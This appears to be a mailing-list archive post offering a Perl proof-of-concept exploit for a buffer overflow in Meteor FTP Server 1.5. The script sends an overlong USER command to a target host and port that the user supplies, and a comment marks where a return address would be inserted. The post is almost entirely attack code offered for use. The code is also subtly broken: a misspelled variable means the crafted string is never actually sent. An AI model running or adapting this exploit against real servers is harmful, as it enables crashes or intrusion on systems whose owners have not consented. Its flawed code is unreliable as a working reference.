<<< Date Index >>>     <<< Thread Index >>>

Meteor FTP Server: PoC Exploit



[INTRO]
Affected version: 1.5
Hello to all!
Bug was found  by Auston J (Anix44@xxxxxxxxx) today.
So its perl code for demostration
[----]


[CODE]
#!/usr/bin/perl

#
# 47meteor_bof.pl - PoC exploit for Meteor FTP Server
# version 1.5 # bug found by Anix44@xxxxxxxxx # # coded by k0r0l from acolytez team # visit http://acolytez.com for details #

use Net::FTP;

# geting data
$host = @ARGV[0];
$port = @ARGV[1];
$debug = @ARGV[2];
# ===========

$ftp_error = "Unable";


if (($host) && ($port)) {
# make exploit string
   $exploit_string = "USER ";
    $exploit_string .= "X"x80;
   #$exploit_string .= "\n\n\n\n"; - it will be new return point !
   #  ===================
print "Trying to connect to $host:$port\n"; $sock = Net::FTP->new("$host",Port => $port, TimeOut => 30, Debug => $debug) or die "[-] Connection failed\n";
   print "[+] Connect OK!\n";
   print "Sending string...\n";
   $sock->login($exploit_sting, "testpassword");
   $answer = $sock->message;
   if ($answer =~ m/$ftp_error/i) {
       print "\n[-] Sorry! Failed\n";
   } else {
       print "\n[+] Send ok!\nServer can be explorated!\n\n";
   }
} else { print "\nMeteor FTP Server - PoC Exploit\nhttp://AcolyteZ.com\n\nUsing: $0 host port [debug: 1 or 0]\n\n";
}

[----]

--
+################################+
# Dim K0r0l (dim@xxxxxxxxxxxx)   #
#                                #
# http://AcolyteZ.com            #
# Net-security, coding, soft etc #
+################################+